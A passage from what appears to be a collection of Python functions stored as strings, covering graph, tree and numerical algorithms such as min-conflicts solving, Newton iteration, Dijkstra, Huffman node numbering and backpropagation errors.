node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n elif nodeType == 'S':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n elif nodeType == 'H':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n if nodeType == 'P':\n try:\n if getCurrentAssignment(superAdjacency, index) != int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0]):\n node_conflict_count[nodeType] = node_conflict_count[nodeType] + 1\n except:\n continue\n choices = [k for k, v in node_conflict_count.items() if v > 0]\n if len(choices) > 0:\n updateNode = random.choice(choices)\n\n if updateNode == lastUpdateNode:\n choices.pop(choices.index(updateNode))\n try:\n lastUpdateNode = random.choice(choices)\n return lastUpdateNode, lastUpdateNode\n except:\n return lastUpdateNode, lastUpdateNode\n else:\n lastUpdateNode = updateNode\n return updateNode, lastUpdateNode\n else:\n return 'NA', 'NA'\n\n\n\n def valueForConflictedVariable(superAdjacency, var):\n for index in superAdjacency:\n nodeType = getNodeType(superAdjacency, index)\n neighbours = getNeighbours(superAdjacency, index)\n if not neighbours:\n continue\n elif str(nodeType) == str(var):\n domain = getDomain(superAdjacency, index)\n\n choice = random.choice(domain)\n if nodeType == 'T':\n choice = int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0])\n elif nodeType == 'S':\n choice = int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0])\n elif nodeType == 'H':\n choice = int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[0])\n if nodeType == 'P':\n choice = int(str(np.sum(getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0])\n\n choice = int(choice)\n if choice % 2 == 0:\n return choice\n else:\n return choice\n\n def min_conflicts(nodes, arcs, max_steps):\n lastUpdateNode = ''\n for i in range(max_steps):\n if isSolution() == True:\n return\n var, lastUpdateNode = findConflictVariable(superAdjacency, lastUpdateNode)\n if var != 'NA':\n value = valueForConflictedVariable(superAdjacency, var)\n updateSuperAdjacency(superAdjacency, var, value)\n node_values_dict[var] = value\n else:\n pass\n\n return\n\n min_conflicts(nodes, arcs, max_steps)\n node_values = getSolution(superAdjacency)\n return node_values", "def newton_raphson(f,x0,iterations): \n current = x0\n fdash = differentiate_polynomial(f)\n print(fdash)\n for i in range(iterations): \n current = current - evaluate_polynomial(f,current)/evaluate_polynomial(fdash,current)\n return current", "def update_nodes(self):\n raise NotImplementedError('ERROR: sweeper has to implement update_nodes(self)')", "def test_compare_old_to_new_method_to_create_trees(self):\n nodes = util.generate_sequence_of_points(2, 2)\n tree1 = kdtree.createNewTree(nodes)\n kdtree.visualize(tree1)\n \n sel_axis = (lambda axis: axis)\n tree2 = kdtree.createNewTree([[0.5, 0.5]],axis = 0, sel_axis= sel_axis)\n tree2.split2([0.25, 0.5], axis = 1)\n tree2.split2([0.75, 0.5], axis = 1)\n \n #left\n tree2.split2([0.25, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.25, 0.75], axis = 0, sel_axis = sel_axis)\n \n #right\n tree2.split2([0.75, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.75, 0.75], axis = 0, sel_axis = sel_axis)\n \n kdtree.visualize(tree2)\n \n for n in zip(kdtree.level_order(tree1), kdtree.level_order(tree2)):\n self.assertEqual(n[0].data, n[1].data, \"elements not equal\")\n \n if n[0].data is not None and n[1].data is not None:\n self.assertEqual(n[0].axis, n[1].axis, \"elements not equal\")", "def prepare_data_for_d(self):\n\n center_nodes = []\n neighbor_nodes = []\n labels = []\n for i in self.root_nodes:\n if np.random.rand() < config.update_ratio:\n # self.graph[i] = [neighbors of i]\n pos = self.graph[i]\n neg, _ = self.sample(i, self.trees[i], len(pos), for_d=True)\n # print(\"tree_i_d: \", self.trees[i])\n # print(\"neg_samples: \", neg)\n # print(\"neg is: \", neg)\n if len(pos) != 0 and neg is not None:\n # positive samples\n center_nodes.extend([i] * len(pos))\n neighbor_nodes.extend(pos)\n labels.extend([1] * len(pos))\n\n # negative samples\n center_nodes.extend([i] * len(pos))\n neighbor_nodes.extend(neg)\n labels.extend([0] * len(neg))\n # print(\"cen: \", center_nodes)\n return center_nodes, neighbor_nodes, labels", "def iterative_solution(list1, list2):\n pre_root = Node(-1)\n prev = pre_root\n\n while list1 and list2:\n if list1.data <= list2.data:\n prev.next = list1\n list1 = list1.next\n else:\n prev.next = list2\n list2 = list2.next\n prev = prev.next\n\n if not list1:\n prev.next = list2\n else:\n prev.next = list1\n\n return pre_root.next", "def startTreeBasedCoord(self):\n self.log_message('ID {0} starts Load Propagation Optimization'.format(self.CommID))\n #self.MsgReceiveCount_interval = 0\n #self.MsgSendCount_interval = 0\n\n self.noOfTimesteps = (self.toTime - self.fromTime) / self.stepSize + 1\n\n # calculate pool of schedules (also saved in self.schedules) and schedule load curves\n if self.getTER1() != 0: # if not a gas boiler\n self.calcSchedulePool(self.fromTime, self.toTime)\n self.calcScheduleConsumptionCurves()\n\n if not self.Parent: #root node\n random.seed() # initialize pseudo random number generator\n\n\n\n # leave nodes select initial best schedule from schedule pool based on fluctuations curve and propagate their load to parent\n if not self.Children:\n #self.ChildrenProcessed = [0 for x in range(len(self.Children))]\n if self.getTER1() != 0: # not a gas boiler\n self.selectBestSchedule(copy.deepcopy(self.ERemainderLocal))\n self.setSOC(self.SOCEnd[self.chosenScheduleIndex])\n self.setStateModlvl(self.chosenSchedule[-1])\n self.sendMessage(self.Parent, 40, ['newload', copy.deepcopy(self.EConsumptionChosenSchedule)])\n else:\n zeros = [0 for x in range(len(self.ERemainderLocal))]\n self.sendMessage(self.Parent, 40, ['newload', copy.deepcopy(zeros)])\n\n else: # if not a leave node\n self.EConsumptionChildCurves = [ [0 for x in range(len(self.EFluctuationCurve))] for y in range(len(self.Children))] # initialize array for load curves of children\n self.EConsumptionChildCurvesRec = [ [0 for x in range(len(self.EFluctuationCurve))] for y in range(len(self.Children))] # initialize array for load curves of children\n self.noOfConsumptionCurvesReceived = 0\n #self.ChildLoadCurvesChosen = [0 for x in range(len(self.Children))]\n return", "def gradients(output_node, node_list):\n # a map from node to a list of gradient contributions from each output node\n node_to_output_grads_list = {}\n # Special note on initializing gradient of output_node as oneslike_op(output_node):\n # We are really taking a derivative of the scalar reduce_sum(output_node)\n # instead of the vector output_node. But this is the common case for loss function.\n node_to_output_grads_list[output_node] = [oneslike_op(output_node)]\n # a map from node to the gradient of that node\n node_to_output_grad = {}\n # Traverse graph in reverse topological order given the output_node that we are taking gradient wrt.\n reverse_topo_order = list(reversed(find_topo_sort([output_node])))\n for node in reverse_topo_order:\n grad = sum_node_list(node_to_output_grads_list[node]) # Node\n node_to_output_grad[node] = grad # node_to_output_grad[node]为对相应的node求导, 即文章中的v^-_n\n grads = node.op.gradient(node, grad) # Node list\n for i in range(len(node.inputs)):\n ch = node.inputs[i]\n grads_list = node_to_output_grads_list.get(ch, [])\n grads_list.append(grads[i])\n node_to_output_grads_list[ch] = grads_list\n\n # Collect results for gradients requested.\n grad_node_list = [node_to_output_grad[node] for node in node_list]\n return grad_node_list", "def iter_func(root_name, root, set_traverse, list_funcs, G, strings,\n plot_nodes, cur_pos, xgrain, min_weight, max_weight):\n set_traverse.append(root)\n nbs = G.neighbors(root)\n nbs = G[root]\n\n plot_nodes.append(cur_pos)\n xgrain = xgrain/2.0\n\n flag_pn = -1\n for nb in nbs.keys():\n if nb in set_traverse:\n continue\n\n next_pos = [0, 0, 0]\n if root.name == root_name:\n next_pos[0] = cur_pos[0]\n else:\n next_pos[0] = cur_pos[0] + xgrain*flag_pn*( 0.8+0.2*(nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight) ) #* (nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight)\n next_pos[1] = cur_pos[1] + 3.0*(nbs[nb][\"weight\"]-1.0/max_weight)/(1.0/min_weight-1.0/max_weight)\n next_pos[2] = nb.name\n\n flag_pn = flag_pn*(-1)\n\n strings.append([root, nb])\n set_traverse, strings, plot_nodes = iter_func(root_name, nb, set_traverse, list_funcs, G, strings, plot_nodes, next_pos, xgrain, min_weight, max_weight)\n\n return set_traverse, strings, plot_nodes", "def run_trial(self, num_nodes): \n #compute the neighbors for the newly-created node\n new_node_neighbors = set()\n for dummy_idx in range(num_nodes):\n new_node_neighbors.add(random.choice(self._node_numbers))\n # update the list of node numbers so that each node number \n # appears in the correct ratio\n self._node_numbers.append(self._num_nodes)\n self._node_numbers.extend(list(new_node_neighbors)) \n #update the number of nodes\n self._num_nodes += 1\n return list(new_node_neighbors)", "def computeNodeVolumes(self):\n for i in np.arange(0,self.ni):\n for j in np.arange(0,self.nj):\n for k in np.arange(0,self.nk):\n \n V = self.dh[0]*self.dh[1]*self.dh[2]\n if (i==0 or i==self.ni-1): V*=0.5\n if (j==0 or j==self.nj-1): V*=0.5\n if (k==0 or k==self.nk-1): V*=0.5\n \n self.node_vol[i][j][k] = V", "def newton_body(iterand):\n next_backward_difference = iterand.next_backward_difference\n next_state_vec = iterand.next_state_vec\n\n rhs = newton_coefficient * step_size_cast * ode_fn_vec(\n next_time,\n next_state_vec) - rhs_constant_term - next_backward_difference\n delta = tf.squeeze(\n tf.linalg.triangular_solve(\n upper,\n tf.matmul(tf.transpose(unitary), rhs[:, tf.newaxis]),\n lower=False))\n num_iters = iterand.num_iters + 1\n\n next_backward_difference += delta\n next_state_vec += delta\n\n delta_norm = tf.cast(tf.norm(delta), real_dtype)\n lipschitz_const = delta_norm / iterand.prev_delta_norm\n\n # Stop if method has converged.\n approx_dist_to_sol = lipschitz_const / (1. - lipschitz_const) * delta_norm\n close_to_sol = approx_dist_to_sol < tol\n delta_norm_is_zero = tf.equal(delta_norm, tf.constant(0., dtype=real_dtype))\n converged = close_to_sol | delta_norm_is_zero\n finished = converged\n\n # Stop if any of the following conditions are met:\n # (A) We have hit the maximum number of iterations.\n # (B) The method is converging too slowly.\n # (C) The method is not expected to converge.\n too_slow = lipschitz_const > 1.\n finished = finished | too_slow\n if max_num_iters is not None:\n too_many_iters = tf.equal(num_iters, max_num_iters)\n num_iters_left = max_num_iters - num_iters\n num_iters_left_cast = tf.cast(num_iters_left, real_dtype)\n wont_converge = (\n approx_dist_to_sol * lipschitz_const**num_iters_left_cast > tol)\n finished = finished | too_many_iters | wont_converge\n\n return [\n _NewtonIterand(\n converged=converged,\n finished=finished,\n next_backward_difference=next_backward_difference,\n next_state_vec=next_state_vec,\n num_iters=num_iters,\n prev_delta_norm=delta_norm)\n ]", "def Trees__LCA_LowestCommonDenominator():\n # Python2 ported to Python3 via 2to3-3.7\n # URL:# URL:https://www.hackerrank.com/challenges/binary-search-tree-lowest-common-ancestor/problem\n '''\n class Node:\n def __init__(self,info): \n self.info = info \n self.left = None \n self.right = None \n // this is a node of the tree , which contains info as data, left , right\n '''\n def lca(root, v1, v2):\n # Find a and b. Link child nodes to parent to be able to backtrack.\n # (1) Note, we add 'parent' attribute to node dynamically via node.parent = ...\n root.parent = None\n node_stack = []\n node_stack.append(root)\n v1_node, v2_node = None, None\n while node_stack:\n node = node_stack.pop()\n if not v1_node and node.info == v1:\n v1_node = node\n if not v2_node and node.info == v2:\n v2_node = node\n for child_node in [node.left, node.right]:\n if child_node:\n child_node.parent = node # (1)\n node_stack.append(child_node)\n\n # Generate path from A to root.\n curr = v1_node\n a_to_root = set()\n while curr:\n a_to_root.add(curr.info)\n curr = curr.parent\n\n # traverse up b until you come across an element in a's path to parent.\n curr = v2_node\n while curr:\n if curr.info in a_to_root:\n return curr\n else:\n curr = curr.parent\n\n print(\"Shouldn't be here, Something went wrong\")\n\n # # Recursive. (Iterative is better, but did recursive for practice.) ~15 min.\n # # Main idea is that we count the number of v1/v2's found of the subnodes.\n # # If a node has sum of 2, we know it's the lca.\n # def lca(root, v1, v2):\n # def lca_helper(node):\n # ret_node = None\n # if not node:\n # return 0, None\n # v_match_counter = 0\n # if node.info in [v1, v2]:\n # v_match_counter += 1\n # left_count, left_node_ret = lca_helper(node.left)\n # right_count, right_node_ret = lca_helper(node.right)\n # v_match_counter += left_count + right_count\n # if v_match_counter == 2:\n # ret_node = node\n # if left_node_ret:\n # ret_node = left_node_ret\n # if right_node_ret:\n # ret_node = right_node_ret\n # return v_match_counter, ret_node\n\n # _, node = lca_helper(root)\n # return node", "def extractTree(nodesList, rootNode):\n if len(nodesList) == 0:\n return\n if nodesList[0] == '!':\n return nodesList[1:]\n\n splitAttribute, splitValue, attributeValue = nodesList[0].strip().split('-')\n nodesList = nodesList[1:]\n \n if splitAttribute != splitValue or splitAttribute != '$' or splitValue != '$':\n rootNode.setSplit((splitAttribute, splitValue))\n else:\n rootNode.setSplit(\"Base case\")\n rootNode.setData(attributeValue)\n return nodesList[2:]\n \n \n leftTree = Tree()\n rightTree = Tree()\n rootNode.setLesser(leftTree)\n rootNode.setGreater(rightTree)\n nodesList = extractTree(nodesList, leftTree)\n\n \n \n nodesList = extractTree(nodesList, rightTree)\n\n return nodesList", "def number_nodes(tree):\n def list_of_nodes(tree):\n \"\"\"Return a list of internal nodes in postorder traversal\n\n @param HuffmanNode tree: a tree to traverse\n @rtype: list\n\n >>> t = HuffmanNode(None, HuffmanNode(6), HuffmanNode(7))\n >>> list_of_nodes(t) == [t]\n True\n >>> t = HuffmanNode(None, HuffmanNode(8), HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)))\n >>> list_of_nodes(t) == [HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)), HuffmanNode(None, HuffmanNode(8), HuffmanNode(None, HuffmanNode(5), HuffmanNode(6)))]\n True\n \"\"\"\n list_ = []\n if tree.left.is_leaf() and tree.right.is_leaf():\n list_.append(tree)\n return list_\n elif tree.left.is_leaf():\n list_.extend(list_of_nodes(tree.right))\n list_.append(tree)\n return list_\n elif tree.right.is_leaf():\n list_.extend(list_of_nodes(tree.left))\n list_.append(tree)\n return list_\n else:\n list_.extend(list_of_nodes(tree.left))\n list_.extend(list_of_nodes(tree.right))\n list_.append(tree)\n return list_\n\n internal_nodes = list_of_nodes(tree)\n for i in range(len(internal_nodes)):\n node = internal_nodes[i]\n node.number = i", "def newCostCalc(dfNew, curCost,a,b):\n a1,a2,a3 = dfNew.iloc[a-2],dfNew.iloc[a-1],dfNew.iloc[a]\n b1,b2,b3 = dfNew.iloc[b-2],dfNew.iloc[b-1],dfNew.iloc[b]\n reCalc = curCost\n reCalc = reCalc - euclideanDistance(a1['x'],a1['y'],a2['x'],a2['y'])\n reCalc = reCalc - euclideanDistance(a2['x'],a2['y'],a3['x'],a3['y'])\n reCalc = reCalc - euclideanDistance(b1['x'],b1['y'],b2['x'],b2['y'])\n reCalc = reCalc - euclideanDistance(b2['x'],b2['y'],b3['x'],b3['y'])\n\n x, y = dfNew.iloc[a-1].copy(), dfNew.iloc[b-1].copy()\n dfNew.iloc[a-1],dfNew.iloc[b-1] = y,x\n\n a1,a2,a3 = dfNew.iloc[a-2],dfNew.iloc[a-1],dfNew.iloc[a]\n b1,b2,b3 = dfNew.iloc[b-2],dfNew.iloc[b-1],dfNew.iloc[b]\n\n reCalc = reCalc + euclideanDistance(a1['x'],a1['y'],a2['x'],a2['y'])\n reCalc = reCalc + euclideanDistance(a2['x'],a2['y'],a3['x'],a3['y'])\n reCalc = reCalc + euclideanDistance(b1['x'],b1['y'],b2['x'],b2['y'])\n reCalc = reCalc + euclideanDistance(b2['x'],b2['y'],b3['x'],b3['y'])\n\n x, y = dfNew.iloc[a-1].copy(), dfNew.iloc[b-1].copy()\n dfNew.iloc[a-1],dfNew.iloc[b-1] = y,x\n\n return reCalc", "def Dijkstra2(node_init, node_end, graph):\n\n ### Parameter initialisation\n node_list = list(graph.vertices.keys())\n dist = np.full(len(node_list), -np.inf)\n # At the beginning we have not reached the end_node\n node_end_reached = False\n # At the beginning, we assume there is a shortest path:\n no_path = False\n \n # Initialising the distances of the nodes\n dist[node_init] = 0\n # Setting the father_node which contains the provenance of the nodes\n father_node = np.full(len(node_list), -np.inf)\n # Initialising the current node\n current_node = node_init \n # Initialising the dictionnary of fixed node which has the following shape:\n #{fixed_node: (previous_node, iteration, cost)}\n # Fixing the number of iterations\n k = 0\n dict_fixed_node = {node_init:(None,k, 0)}\n \n # In the trivial case where the two nodes are identical\n if node_init == node_end:\n cost = 0\n shortest_path = [node_init]\n no_path = False\n return cost, shortest_path, no_path\n \n # While the end node has not been reached\n while not node_end_reached:\n current_node_adj = graph.node_get_adj(current_node).copy()\n # We get rid off the nodes that have been fixed, except at the first iteration\n if k != 0:\n current_node_adj.remove(dict_fixed_node[current_node][0])\n ## Updating the distances : either the node are neighbors and \n # something might change, either they are not, and their distance \n # does not change.\n # For the neighbors node\n for e in current_node_adj:\n dist_temp = dist[current_node] + graph.weights[(current_node, e)]\n # We change the distance only if it is lower than it used to be\n # otherwise, we keep it\n if dist_temp < dist[e] or dist[e] == -np.inf:\n dist[e] = dist_temp\n # Setting the father node\n father_node[e] = current_node\n father_node[current_node] = None\n # We set the distance of the current node to 0\n dist[current_node] = 0 \n # Index and distances which are not 0 and not minus infty\n sub_dist_index = [i for i, e in enumerate(dist) if e > 0]\n sub_dist_value = np.array([e for i, e in enumerate(dist) if e > 0])\n # If these two lists are empty, we stop the algorithm and that means\n # that we cannot reach our point\n if not sub_dist_index or sub_dist_value.size == 0:\n no_path = True\n cost = 'impossible path'\n shortest_path = 'impossible path'\n break\n # Now we need to set our choice for the next node\n if np.array_equal(sub_dist_value, np.ones(len(sub_dist_value))):\n ## If there are only ones : we pick them up randomly\n current_node = int(random.choice(list(sub_dist_index)))\n min_dist = sub_dist_value.min()\n else:\n ## If not we just pick up the one with the minimum distance.\n current_node = sub_dist_index[sub_dist_value.argmin()]\n min_dist = sub_dist_value.min()\n # Adding this node to the dictionnary\n dict_fixed_node[current_node] = (int(father_node[current_node]), k, min_dist)\n # If the end_node has been reached, we stop the search algorithm\n if node_end in dict_fixed_node.keys():\n node_end_reached = True\n # Incrementing the counter\n k += 1\n #print('current_node : {}'.format(current_node))\n #print(dict_fixed_node)\n # Now we need to get the shortest path from our iterations whose information \n # are in dict_fixed_node. To do this, we need to circle back from the end_node\n # to the init_node in this dictionnary.\n # This is done only if some path between node_init and end_node exists.\n if no_path == False:\n list_father_node = list(dict_fixed_node.values())\n previous_node = list_father_node[-1][0]\n shortest_path = [node_end, previous_node]\n # While the initial node has not been reached, we add the relevant\n # nodes to our shortest path\n while previous_node != node_init:\n previous_node = dict_fixed_node[previous_node][0]\n shortest_path.append(previous_node)\n \n # Computing the cost of this shortest path in terms of weights\n cost = int(dict_fixed_node[node_end][2])\n \n return cost, shortest_path, no_path", "async def calc_nodes(height, balances, zero_nodes_lookup, root_index, hash_func):\n if len(balances) == 0:\n return {root_index: zero_nodes_lookup[height]}\n if height == 0:\n assert len(balances) == 1\n _, vault_data = balances[-1]\n balance = int(vault_data['amount'])\n # A node with balance=0 is considered uninitialized.\n if balance == 0:\n return {root_index: zero_nodes_lookup[0]}\n stark_key = int(vault_data['stark_key'])\n token_id = int(vault_data['token_id'])\n return {root_index: await vault_hash_async(stark_key, token_id, balance, hash_func)}\n mid = 2 ** (height - 1)\n left_balances = [(i, data) for i, data in balances if i < mid]\n right_balances = [(i - mid, data) for i, data in balances if i >= mid]\n left, right = await asyncio.gather(\n calc_nodes(height - 1, left_balances, zero_nodes_lookup, 2 * root_index, hash_func),\n calc_nodes(height - 1, right_balances, zero_nodes_lookup, 2 * root_index + 1, hash_func))\n nodes = {root_index: await hash_func(left[2 * root_index], right[2 * root_index + 1])}\n nodes.update(left)\n nodes.update(right)\n return nodes", "def transform(nodes, weights, new_corners):\n if nodes.shape[1] == 1:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n M = np.zeros((1, 1))\n M[:, 0] = 0.5 * (x_1 - x_0)\n origin = np.array([-1.0])\n elif nodes.shape[1] == 2:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n x_2 = new_corners[2, :]\n M = np.zeros((2, 2))\n M[:, 0] = 0.5 * (x_1 - x_0)\n M[:, 1] = 0.5 * (x_2 - x_0)\n origin = np.array([-1.0, -1.0])\n elif nodes.shape[1] == 3:\n x_0 = new_corners[0, :]\n x_1 = new_corners[1, :]\n x_2 = new_corners[2, :]\n x_3 = new_corners[3, :]\n M = np.zeros((3, 3))\n M[:, 0] = 0.5 * (x_1 - x_0)\n M[:, 1] = 0.5 * (x_2 - x_0)\n M[:, 2] = 0.5 * (x_3 - x_0)\n origin = np.array([-1.0, -1.0, -1.0])\n\n offset = -M @ origin + x_0\n volume_fraction = np.abs(np.linalg.det(M))\n return np.add(nodes @ M.T, offset), volume_fraction * weights", "def create_leaves(self, parent_node, leaf_values):\n # TODO: find generalization!!\n import numpy as np\n # creating the leaf object\n parent_node.child_nodes[0] = self.leaf_type(0.0, 0, diagram_type=self.__class__)\n\n # creating the offsets\n # deciding on mult or add rule\n # additive_coefficient = np.mean(leaf_values)\n # new_offsets = np.array([leaf_values[i]-additive_coefficient for i in range(self.base)])\n # max_difference = np.max(np.abs(new_offsets))\n # mult_coefficient = max_difference if max_difference != 0.0 else 1.0\n # for i in range(self.base):\n # node.child_nodes[i] = node.child_nodes[0]\n # node.offsets[i] = np.array([((new_offsets[i])/mult_coefficient), mult_coefficient], dtype='float64')\n # return node, [additive_coefficient, mult_coefficient]\n if leaf_values[0] == 0 or (leaf_values[1]-leaf_values[0] < leaf_values[1]/leaf_values[0]):\n parent_node.offsets[0] = np.array([0, 1], dtype='float64')\n for i in range(1, self.base, 1):\n parent_node.child_nodes[i] = parent_node.child_nodes[0]\n parent_node.offsets[i] = np.array([(leaf_values[i]-leaf_values[0]), 1], dtype='float64')\n return parent_node, [leaf_values[0], 1]\n else:\n parent_node.offsets[0] = np.array([1, 1], dtype='float64')\n for i in range(1, self.base, 1):\n parent_node.child_nodes[i] = parent_node.child_nodes[0]\n parent_node.offsets[i] = np.array([leaf_values[i]/leaf_values[0], (leaf_values[i]/leaf_values[0])],\n dtype='float64')\n return parent_node, [0, leaf_values[0]]", "def computeNodeErrors(net, inputs, actualOutputs):\n errors = {}\n squareError = 0.0\n label = net.run(inputs)\n predictedOutputs = [1.0 if l == label else 0.0 for l in net.validLabels]\n for i, node in enumerate(net.outputLayer):\n errors[node] = predictedOutputs[i] - actualOutputs[i]\n squareError += errors[node] ** 2\n if squareError == 0.0: # No need to continue\n return ({node:0.0 for node in net.nodes}, 0.0)\n reversedLayers = net.hiddenLayers[:]\n reversedLayers.reverse()\n toBeComputed = []\n for layer in reversedLayers:\n toBeComputed += layer\n while len(toBeComputed) > 0: # Repeat until all nodes processed\n newToBeComputed = []\n for node in toBeComputed:\n notComputable = False\n totalChildError = 0\n for child in node.children:\n if child not in errors: # Cannot yet compute\n notComputable = True\n break\n childError = errors[child]\n weight = child.weights[node]\n totalChildError += childError * weight\n if notComputable:\n newToBeComputed.append(node)\n else:\n activationDerivative = DERIVATIVES[node.activationFunc]\n if activationDerivative is None:\n raise TrainingError(\"Activation function of node \"\n + str(node) + \" is non-differentiable.\")\n weightedInput = node.getWeightedInputSum(BYPASS)\n nodeDerivative = activationDerivative(weightedInput)\n errors[node] = nodeDerivative * totalChildError\n toBeComputed = newToBeComputed\n return (errors, squareError)", "def newton_method_bidirectional(f, bnd1, bnd2, Ep, step):\n\n while True:\n step = step + 1\n\n # print(\"bnd1=\",bnd1,\" and bnd2=\",bnd2)\n\n h_bnd1 = f(bnd1) / derivative(f, bnd1)\n bnd1 = bnd1 - h_bnd1\n if (decide(abs(h_bnd1) <= Ep)):\n # print(\"Root in Approximation: \",bnd1)\n return step\n\n h_bnd2 = f(bnd2) / derivative(f, bnd2)\n bnd2 = bnd2 - h_bnd2\n if (decide(abs(h_bnd2) <= Ep)):\n # print(\"Root in Approximation: \",bnd2)\n return step", "def algorithm(self):\n t = time.clock()\n self.calculateFirstPath()\n improve = True\n while improve and (self.allowedTime > (time.clock() - t)):\n improve = False\n\n for i in range(self.NB_OF_NODES):\n for j in range(self.NB_OF_NODES):\n if j in [(i - 1) % self.NB_OF_NODES, i, (i + 1) % self.NB_OF_NODES]:\n continue\n\n if self.getDistance(i, i + 1) + self.getDistance(j, j + 1) > self.getDistance(i, j) + self.getDistance(i + 1, j + 1):\n self.exchange(i, j)\n improve = True", "def evaluate(\n self, nodes, derivatives=np.array([0, 0, 0]), modes=None, unique=False\n ):", "def rewire(self, new_node, near_indexes):\n\n for i in near_indexes:\n near_node = self.node_list[i]\n edge_node = self.steer(new_node, near_node)\n if not edge_node:\n continue\n edge_node.cost = self.calc_new_cost(new_node, near_node)\n\n no_collision = self.check_collision(edge_node, self.obstacle_list)\n improved_cost = near_node.cost > edge_node.cost\n\n if no_collision and improved_cost:\n self.node_list[i] = edge_node\n self.propagate_cost_to_leaves(new_node)", "def find_all_feedbacks_Tarjan(ls_nodenames, lt_links):\n \n ll_SCC = SCC_analysis.decompose_SCC(ls_nodenames, lt_links)\n ll_feedbacks = []\n for l_SCC in ll_SCC:\n lt_links_in_SCC = basic_topology_functions.extract_subnet_topology(lt_links, l_SCC)\n print(\"feedbacks are calculated in subnetwork with \",len(l_SCC),\" nodes\")\n \n dic_startnode_endnodes = {}\n for s_nodename in l_SCC:\n dic_startnode_endnodes[s_nodename] = []\n for t_link in lt_links_in_SCC:\n if t_link[0] == s_nodename:\n dic_startnode_endnodes[s_nodename].append(t_link[-1])\n #print(dic_startnode_endnodes)\n dic_node_counter = {}\n for s_nodename in l_SCC:\n dic_node_counter[s_nodename] = len(dic_startnode_endnodes[s_nodename])-1\n #print(dic_node_counter)\n for s_node_trajectorystart in dic_node_counter.keys():\n if dic_node_counter[s_node_trajectorystart] == -1: #this means that all feedback containing this node are all calculated\n continue\n else:\n l_trajectory = [s_node_trajectorystart]\n while l_trajectory:\n #print(l_trajectory)\n i_counter = dic_node_counter[l_trajectory[-1]]\n if i_counter == -1:\n dic_node_counter[l_trajectory[-1]] = len(dic_startnode_endnodes[l_trajectory[-1]])-1\n l_trajectory.pop()\n if l_trajectory:\n dic_node_counter[l_trajectory[-1]] -= 1\n else:\n s_node_next = dic_startnode_endnodes[l_trajectory[-1]][i_counter]\n if s_node_next == s_node_trajectorystart:\n ll_feedbacks.append(list(l_trajectory))\n if len(ll_feedbacks)%20000 == 0:\n print(\"calculated feedbacks are now \",len(ll_feedbacks))\n \n if s_node_next in l_trajectory:\n dic_node_counter[l_trajectory[-1]] -= 1\n else:\n l_trajectory.append(s_node_next)\n dic_startnode_endnodes[s_node_trajectorystart] = []\n dic_node_counter[s_node_trajectorystart] =-1\n \n return ll_feedbacks", "def perform(self, node, inputs, outputs):\r\n x, w, v, W, V = inputs\r\n N = x.shape[0]\r\n outer = numpy.outer\r\n\r\n G = lambda n: sum(v[:, m] * V.T[n].dot(v[:, m]) / (w[n] - w[m])\r\n for m in xrange(N) if m != n)\r\n g = sum(outer(v[:, n], v[:, n] * W[n] + G(n))\r\n for n in xrange(N))\r\n\r\n # Numpy's eigh(a, 'L') (eigh(a, 'U')) is a function of tril(a)\r\n # (triu(a)) only. This means that partial derivative of\r\n # eigh(a, 'L') (eigh(a, 'U')) with respect to a[i,j] is zero\r\n # for i < j (i > j). At the same time, non-zero components of\r\n # the gradient must account for the fact that variation of the\r\n # opposite triangle contributes to variation of two elements\r\n # of Hermitian (symmetric) matrix. The following line\r\n # implements the necessary logic.\r\n out = self.tri0(g) + self.tri1(g).T\r\n\r\n # The call to self.tri0 in perform upcast from float32 to\r\n # float64 or from int* to int64 in numpy 1.6.1 but not in\r\n # 1.6.2. We do not want version dependent dtype in Theano.\r\n # We think it should be the same as the output.\r\n outputs[0][0] = numpy.asarray(out, dtype=node.outputs[0].dtype)", "def my_Newton( fct, df_dx, x0):\r\n xn = float(x0)\r\n eps = 1e-5\r\n N = 20\r\n i = 0\r\n while abs( fct( xn**(i + 1)) - fct( xn**i)) > eps and i < N:\r\n x_next = xn - fct(xn)/df_dx(xn)\r\n print( i, 'fct value', abs( fct(xn)), x_next)\r\n xn = x_next\r\n i += 1\r\n if abs( fct( xn)) < eps:\r\n return x_next\r\n else: #solution did not converge\r\n return np.nan", "def brute_tree(XTRAIN,istopTRAIN,XTEST,istopTEST):\n \n ntrain=XTRAIN.shape[0]\n ntest=XTEST.shape[0]\n \n if np.sum(istopTRAIN)==0:\n return 0,[]\n\n cost0=np.zeros(Ngammas*Nreps)\n cost1=np.zeros(Ngammas*Nreps)\n cost0test=np.zeros(Ngammas*Nreps)\n cost1test=np.zeros(Ngammas*Nreps)\n \n precisionTRAIN=np.zeros(Ngammas*Nreps)\n precisionTEST=np.zeros(Ngammas*Nreps)\n recallTEST=np.zeros(Ngammas*Nreps)\n rate=np.zeros(Ngammas*Nreps)\n \n for iii in range(Ngammas):\n \n gamma=GAMMA[iii]\n \n for jjj in range(Nreps):\n \n \"\"\" train a tree using training data with random splitting \"\"\"\n \n tree_hyperparameters['class_weight']={0:1,1:gamma}\n clf=tree.DecisionTreeClassifier(**tree_hyperparameters)\n clf.fit(XTRAIN,istopTRAIN)\n \n \"\"\"\" record costs and precision on validation data \"\"\"\n \n pTRAIN=clf.predict(XTRAIN)\n precisionTRAIN[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntrain) if pTRAIN[i] == 1 